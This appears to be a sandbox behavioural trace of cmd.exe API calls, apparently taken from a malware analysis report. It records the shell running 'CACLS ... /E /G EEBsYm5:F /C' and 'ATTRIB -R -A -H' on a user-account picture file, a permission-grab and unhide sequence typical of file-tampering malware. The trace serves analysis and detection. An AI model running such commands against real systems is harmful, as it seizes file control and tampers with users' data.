[0180.135] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0180.135] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0180.135] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.135] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0180.135] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0180.135] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0180.135] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0180.135] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0180.135] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0180.135] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0180.135] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0180.135] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0180.135] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0180.136] GetEnvironmentStringsW () returned 0x302458* [0180.136] FreeEnvironmentStringsW (penv=0x302458) returned 1 [0180.136] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.136] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0180.136] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0180.136] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0180.136] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") 
returned 8 [0180.136] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0180.136] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0180.136] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0180.136] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0180.136] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0180.136] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fbe8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0180.136] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fbe8, lpFilePart=0x24fbe4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fbe4*="Desktop") returned 0x18 [0180.136] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0180.136] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f964 | out: lpFindFileData=0x24f964) returned 0x300ae8 [0180.136] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0180.136] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f964 | out: lpFindFileData=0x24f964) returned 0x300ae8 [0180.137] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0180.137] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f964 | out: lpFindFileData=0x24f964) returned 0x300ae8 [0180.137] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0180.137] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0180.137] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0180.137] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0180.137] GetEnvironmentStringsW () returned 0x300308* [0180.137] FreeEnvironmentStringsW (penv=0x300308) 
returned 1 [0180.137] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0180.138] GetConsoleOutputCP () returned 0x1b5 [0180.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0180.138] GetUserDefaultLCID () returned 0x409 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fd28, cchData=128 | out: lpLCData="0") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fd28, cchData=128 | out: lpLCData="0") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fd28, cchData=128 | out: lpLCData="1") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0180.138] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0180.139] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0180.139] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0180.140] GetConsoleTitleW (in: lpConsoleTitle=0x2f09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0180.140] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0180.140] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0180.140] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0180.141] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0180.141] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0180.141] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0180.141] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0180.141] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0180.141] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0180.141] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0180.141] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0180.207] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0180.207] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0180.207] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0180.207] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0180.207] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0180.207] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0180.207] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0180.229] GetConsoleTitleW (in: lpConsoleTitle=0x24f9bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.229] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0180.229] _wcsicmp (_String1="CACLS", 
_String2="ERASE") returned -2 [0180.229] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0180.229] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0180.230] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0180.230] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0180.230] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0180.230] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0180.230] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0180.230] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0180.230] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0180.230] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0180.230] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0180.230] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0180.230] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0180.230] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0180.230] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0180.230] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0180.230] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0180.230] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0180.230] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0180.230] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0180.230] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0180.230] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0180.230] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0180.230] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0180.230] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0180.230] _wcsicmp (_String1="CACLS", 
_String2="TITLE") returned -17 [0180.230] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0180.230] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0180.230] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0180.230] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0180.230] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0180.230] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0180.230] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0180.230] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0180.230] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0180.230] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0180.230] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0180.231] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0180.231] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0180.231] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0180.231] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0180.231] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0180.231] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0180.231] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0180.231] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0180.231] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0180.231] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0180.231] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0180.231] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0180.231] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0180.231] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0180.231] _wcsicmp (_String1="CACLS", 
_String2="RD") returned -15 [0180.231] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0180.231] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0180.231] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0180.231] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0180.231] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0180.231] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0180.231] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0180.231] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0180.231] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0180.231] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0180.231] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0180.231] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0180.231] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0180.231] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0180.231] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0180.231] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0180.231] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0180.231] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0180.231] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0180.231] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0180.231] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0180.232] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0180.232] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0180.232] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0180.232] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0180.232] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0180.232] 
SetErrorMode (uMode=0x0) returned 0x0 [0180.232] SetErrorMode (uMode=0x1) returned 0x0 [0180.232] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x301e98, lpFilePart=0x24f4dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f4dc*="Desktop") returned 0x18 [0180.232] SetErrorMode (uMode=0x0) returned 0x1 [0180.232] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0180.232] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.238] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.238] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.239] GetLastError () returned 0x2 [0180.239] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.239] GetLastError () returned 0x2 [0180.239] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0x302180 [0180.239] FindClose (in: hFindFile=0x302180 | out: hFindFile=0x302180) returned 1 [0180.239] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.239] GetLastError () returned 0x2 [0180.239] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0x302180 [0180.239] FindClose (in: hFindFile=0x302180 | out: hFindFile=0x302180) returned 1 [0180.240] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0180.240] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0180.240] GetConsoleTitleW (in: lpConsoleTitle=0x24f750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.240] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f6a0 | out: lpAttributeList=0x24f5d8, lpSize=0x24f6a0) returned 1 [0180.240] UpdateProcThreadAttribute (in: lpAttributeList=0x24f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f698, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f5d8, lpPreviousValue=0x0) returned 1 [0180.240] GetStartupInfoW (in: lpStartupInfo=0x24f594 | out: lpStartupInfo=0x24f594*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0180.240] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0180.241] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f634*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile13.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f680 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x24f680*(hProcess=0x50, hThread=0x4c, dwProcessId=0x67c, dwThreadId=0x188)) returned 1 [0180.243] CloseHandle (hObject=0x4c) returned 1 [0180.243] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.243] GetEnvironmentStringsW () returned 0x300308* [0180.243] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0180.243] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0180.443] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f574 | out: lpExitCode=0x24f574*=0x0) returned 1 [0180.443] CloseHandle (hObject=0x50) returned 1 [0180.443] _vsnwprintf (in: _Buffer=0x24f6bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f580 | out: _Buffer="00000000") returned 8 [0180.443] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.443] GetEnvironmentStringsW () returned 0x302410* [0180.444] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.444] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.444] GetEnvironmentStringsW () returned 0x302410* [0180.444] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.444] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f5d8 | out: lpAttributeList=0x24f5d8) [0180.444] GetConsoleTitleW (in: lpConsoleTitle=0x24f9bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.444] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0180.444] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.444] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.444] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.445] GetLastError () returned 0x2 [0180.445] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.445] GetLastError () returned 0x2 [0180.445] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0x2fe4d8 [0180.445] FindClose (in: hFindFile=0x2fe4d8 | out: hFindFile=0x2fe4d8) returned 1 [0180.445] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0xffffffff [0180.445] GetLastError () returned 0x2 [0180.446] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f258, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f258) returned 0x2fe4d8 [0180.446] FindClose (in: hFindFile=0x2fe4d8 | out: hFindFile=0x2fe4d8) returned 1 [0180.446] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0180.446] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0180.446] GetConsoleTitleW (in: 
lpConsoleTitle=0x24f750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.446] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f6a0 | out: lpAttributeList=0x24f5d8, lpSize=0x24f6a0) returned 1 [0180.446] UpdateProcThreadAttribute (in: lpAttributeList=0x24f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f698, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f5d8, lpPreviousValue=0x0) returned 1 [0180.446] GetStartupInfoW (in: lpStartupInfo=0x24f594 | out: lpStartupInfo=0x24f594*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0180.446] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0180.446] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f634*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f680 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"", 
lpProcessInformation=0x24f680*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc74, dwThreadId=0xce0)) returned 1 [0180.448] CloseHandle (hObject=0x50) returned 1 [0180.448] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.448] GetEnvironmentStringsW () returned 0x302410* [0180.448] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.448] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0180.504] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f574 | out: lpExitCode=0x24f574*=0x0) returned 1 [0180.504] CloseHandle (hObject=0x4c) returned 1 [0180.504] _vsnwprintf (in: _Buffer=0x24f6bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f580 | out: _Buffer="00000000") returned 8 [0180.504] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.504] GetEnvironmentStringsW () returned 0x302410* [0180.504] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.504] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.504] GetEnvironmentStringsW () returned 0x302410* [0180.504] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0180.505] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f5d8 | out: lpAttributeList=0x24f5d8) [0180.505] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.505] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0180.505] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.505] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0180.505] _get_osfhandle (_FileHandle=0) returned 0x3 [0180.505] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0180.505] SetConsoleInputExeNameW () returned 0x1 [0180.505] GetConsoleOutputCP () returned 0x1b5 [0180.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0180.505] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.505] exit (_Code=0) Process: id = 
